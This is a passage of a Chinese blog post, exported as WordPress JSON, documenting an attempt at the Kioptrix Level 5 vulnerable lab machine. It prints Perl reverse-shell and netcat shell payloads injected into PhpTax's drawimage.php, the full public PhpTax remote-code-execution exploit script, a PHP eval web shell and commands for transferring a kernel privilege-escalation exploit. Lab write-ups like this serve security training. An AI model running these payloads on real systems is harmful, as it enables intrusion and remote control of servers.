lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217185.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217185.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129185656208\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u77e5\u9053\u54ea\u91cc\u5e03\u7f6e\u7684\u4e0d\u5bf9\uff0c\u91cd\u65b0\u6765\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-perl\"># Server\nxxx;perl -e &#039;use Socket;$i=&quot;192.168.244.133&quot;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/sh -i&quot;);};&#039;\n# Client \nnc -nlkvp 1234<\/code><\/pre>\n<p>\u7f16\u7801\u5b8c\u4ee5\u540e\uff0c\u8fd8\u662f\u641e\u4e0d\u5230\u3002\u3002\u3002\u3002\u53ef\u80fd\u4e4b\u524d\u5565\u5730\u65b9\u505a\u7684\u4e0d\u592a\u5bf9\uff0c\u91cd\u65b0\u68b3\u7406\u4e00\u4e0b\u601d\u8def\u641e\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n<p>\u2460 \u6293\u5305<\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.244.144:8080\/phptax<\/code><\/pre>\n<p>\u2461\u4fee\u6539<code>User-Agent:Mozilla\/4.0 Mozilla4_browser<\/code><\/p>\n<p>\u2462\u7f16\u7801<code>\u53cd\u5f39shell<\/code>\u63d2\u5165<code>payload<\/code>\uff1a<\/p>\n<pre><code class=\"language-perl\"># perl \u53cd\u5f39shell\nperl -e &#039;use Socket;$i=&quot;192.168.244.133&quot;;$p=2233;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/sh -i&quot;);};&#039;\n# payload\uff1a\nhttp:\/\/localhost\/phptax\/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20\/bin\/bash;&pdf=make\n# \u4fee\u6539\u540e\nhttp:\/\/192.168.244.144:8080\/phptax\/drawimage.php?pfilez=xxx;perl -e \u2018use Socket;$i=\u201d192.168.244.133&quot;; $p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\u201ctcp\u201d));if(connect(S,sockaddr_in( {open(STDIN,\u201d&gt;&amp;S\u201d);open(STDOUT,\u201d&gt;&amp;S\u201d);open(STDERR,\u201d&gt;&amp;S\u201d);exec(\u201c\/ bin\/sh -i\u201d);};\u2019;&amp;pdf=make\n# \u7f16\u7801\u540e\nhttp:\/\/192.168.244.144:8080\/phptax\/drawimage.php?pfilez=xxx;perl+-e+%27use+Socket%3B%24i%3D%22192.168.244.133%22%3B%24p%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh+-i%22%29%3B%7D%3B%27;&pdf=make\n# \u5f00\u542f\u76d1\u542c\nnc -lvnp 1234<\/code><\/pre>\n<p>\u4e0d\u77e5\u9053\u4e3a\u5565\uff0c\u8fd9\u91cc\u5c31\u662f\u8fde\u4e0d\u4e0a\u53bb\u3002\u3002\u3002\u3002\u3002<\/p>\n<p>\u6362\u4e00\u4e2a\u529e\u6cd5\u5427\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217186.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217186.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129203101864\" \/><\/div><\/p>\n<pre><code class=\"language-php\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ cat 25849.txt\n#\n#  ,--^----------,--------,-----,-------^--,\n#  | |||||||||   `--------&#039;     |          O .. CWH Underground Hacking Team ..\n#  `+---------------------------^----------|\n#    `\\_,-------, _________________________|\n#      \/ XXXXXX \/`|     \/\n#     \/ XXXXXX \/  `\\   \/\n#    \/ XXXXXX \/\\______(\n#   \/ XXXXXX \/\n#  \/ XXXXXX \/\n# (________(\n#  `------&#039;\n\n# Exploit Title   : PhpTax File Manipulation(newvalue,field) Remote Code Execution\n# Date            : 31 May 2013\n# Exploit Author  : CWH Underground\n# Site            : www.2600.in.th\n# Vendor Homepage : http:\/\/phptax.sourceforge.net\/\n# Software Link   : http:\/\/sourceforge.net\/projects\/phptax\/\n# Version         : 0.8\n# Tested on       : Window and Linux\n\n#####################################################\n#VULNERABILITY: FILE MANIPULATION TO REMOTE COMMAND EXECUTION\n#####################################################\n\n#index.php\n\n#LINE 32: fwrite fwrite($zz, &quot;$_GET[&#039;newvalue&#039;]&quot;);\n#LINE 31: $zz = fopen(&quot;.\/data\/$field&quot;, &quot;w&quot;);\n#LINE  2: $field = $_GET[&#039;field&#039;];\n\n#####################################################\n#DESCRIPTION\n#####################################################\n\n#An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability.\n#User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file.\n#An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server.\n\n#####################################################\n#EXPLOIT\n#####################################################\n\n&lt;?php\n\n$options = getopt(&#039;u:&#039;);\n\nif(!isset($options[&#039;u&#039;]))\ndie(&quot;\\n        Usage example: php exploit.php -u http:\/\/target.com\/ \\n&quot;);\n\n$url     =  $options[&#039;u&#039;];\n$shell = &quot;{$url}\/index.php?field=rce.php&amp;newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E&quot;;\n\n$headers = array(&#039;User-Agent: Mozilla\/4.0 (compatible; MSIE 5.01; Windows NT 5.0)&#039;,\n&#039;Content-Type: text\/plain&#039;);\n\necho &quot;        [+] Submitting request to: {$options[&#039;u&#039;]}\\n&quot;;\n\n$handle = curl_init();\n\ncurl_setopt($handle, CURLOPT_URL, $url);\ncurl_setopt($handle, CURLOPT_HTTPHEADER, $headers);\ncurl_setopt($handle, CURLOPT_RETURNTRANSFER, true);\n\n$source = curl_exec($handle);\ncurl_close($handle);\n\nif(!strpos($source, &#039;Undefined variable: HTTP_RAW_POST_DATA&#039;) &amp;&amp; @fopen($shell, &#039;r&#039;))\n{\necho &quot;        [+] Exploit completed successfully!\\n&quot;;\necho &quot;        ______________________________________________\\n\\n        {$url}\/data\/rce.php?cmd=id\\n&quot;;\n}\nelse\n{\ndie(&quot;        [+] Exploit was unsuccessful.\\n&quot;);\n}\n\n?&gt;\n\n################################################################################################################\n# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2\n################################################################################################################ <\/code><\/pre>\n<p>\u6ce8\u610f\u5230<\/p>\n<pre><code class=\"language-php\">\/index.php?field=rce.php&amp;newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E\n==&gt; \/index.php?field=rce.php&amp;newvalue=&lt;?php passthru($_GET[cmd]);?&gt;<\/code><\/pre>\n<p>\u901a\u8fc7<code>field<\/code>\u548c<code>newvalue<\/code>\u53c2\u6570\u521b\u5efa\u6587\u4ef6\uff0c\u5e76\u5199\u5165\u547d\u4ee4\u6267\u884c\u4ee3\u7801\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217187.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217187.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129204256359\" \/><\/div><\/p>\n<p>\u8c8c\u4f3c\u6267\u884c\u6210\u529f\u4e86\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u770b\u770b\u80fd\u4e0d\u80fd\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217188.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217188.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129204357760\" \/><\/div><\/p>\n<p>\u6210\u529f\uff01\u8fd9\u6837\u4e00\u6765\u5c31\u597d\u529e\u4e86\uff0c\u5199\u4e00\u4e2a\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u7136\u540e\u8fde\u63a5\uff1a<\/p>\n<pre><code class=\"language-php\">http:\/\/192.168.244.144:8080\/phptax\/index.php?field=rce.php&amp;newvalue=&lt;?php @eval($_POST[&#039;hack&#039;]);?&gt;<\/code><\/pre>\n<p>\u8681\u5251\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217189.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217189.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129205132178\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217190.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217190.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129205147206\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u5230\u666e\u901a\u7528\u6237\u6743\u9650\u4e86\uff0c\u5c1d\u8bd5\u4f7f\u7528\u5185\u6838\u6f0f\u6d1e\u8fdb\u884c\u63d0\u6743\uff0c\u4e0d\u8fc7\u6211\u4eec\u53ef\u4ee5\u4fdd\u9669\u8d77\u89c1\uff0c\u518d\u67e5\u4e00\u4e0b\u5185\u6838\u7248\u672c\u5bf9\u4e0d\u5bf9\uff1a<\/p>\n<pre><code class=\"language-shell\">(www:\/usr\/local\/www\/apache22\/data2\/phptax\/data) $ uname -a\nFreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:\/usr\/obj\/usr\/src\/sys\/GENERIC  amd64<\/code><\/pre>\n<p>\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<pre><code class=\"language-shell\"># Server \ncd \/tmp\nnc 192.168.244.133 1234 &gt; 26368.c\n# Client\nnc -lvp 1234 &lt; 26368.c <\/code><\/pre>\n<p>\u76d1\u542c\u4f1a\u4e2d\u65ad\uff0c\u4f46\u662f\u5df2\u7ecf\u4f20\u8fc7\u53bb\u4e86\u3002<\/p>\n<p>\u7f16\u8bd1\u8fd0\u884c\u5373\u53ef\u83b7\u5f97 root \u6743\u9650\uff0c\u4f46\u662f\u6211\u8fd9\u91cc\u4e0d\u77e5\u9053\u4e3a\u5565\u4e00\u76f4\u4e0d\u884c\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217191.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217191.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129213322195\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c31\u5230\u8fd9\u5427\uff0c<code>metasploit<\/code>\u4e5f\u5c1d\u8bd5\u4e86\uff0c\u6b7b\u90fd\u641e\u4e0d\u597d\uff0c\u53ef\u6076\uff0c\u96be\u9053\u53c8\u72af\u4f4e\u7ea7\u9519\u8bef\u4e86\uff1f<\/p>\n<h2>\u91cd\u542f\u9776\u573a\uff0c\u5168\u90e8\u63a8\u5230\u91cd\u6765<\/h2>\n<p>\u56e0\u4e3a\u662f\u91cd\u65b0\u6765\uff0c\u6211\u5c31\u4e0d\u8bf4\u4e86\uff0c\u4ec5\u5c55\u793a\u5173\u952e\u4ee3\u7801\u53ca\u7ed3\u679c\u662f\u5426\u6b63\u786e\uff1a<\/p>\n<pre><code class=\"language-perl\">\/phptax\/drawimage.php?pfilez=xxx;%20perl -e &#039;use Socket;$i=&quot;192.168.244.144&quot;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/bash -i&quot;);};&#039;;&amp;pdf=make\n# URL\u7f16\u7801\n\/phptax\/drawimage.php?pfilez=xxx;%20perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.244.144%22%3B%24p%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22\/bin\/bash%20-i%22%29%3B%7D%3B&#039;;&amp;pdf=make<\/code><\/pre>\n<p>\u7ecf\u8fc7\u5c1d\u8bd5\uff0c\u5931\u8d25\uff0c\u4e0d\u77e5\u9053\u662f\u5565\u539f\u56e0\uff0c\u4e0b\u56de\u518d\u8bd5\u5427\uff0c\u6709\u5176\u4ed6\u4e8b\u60c5\u8981\u5fd9\u4e86\uff0c\u5bb3\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>KIOPTRIX LEVEL 5\uff08\u5931\u8d25\uff09 \u6f2b\u957f\u7684debug\uff08\u7f51\u5361\u65e0\u6cd5\u8fde\u63a5\/\u65e0\u6cd5\u83b7\u53d6IP\uff09 \u6253\u5f00\u73af\u5883\uff0c\u5982\u679c\u83b7\u53d6\u4e0d [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-331","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/331","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=331"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/331\/revisions"}],"predecessor-version":[{"id":332,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/331\/revisions\/332"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=331"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=331"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=331"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}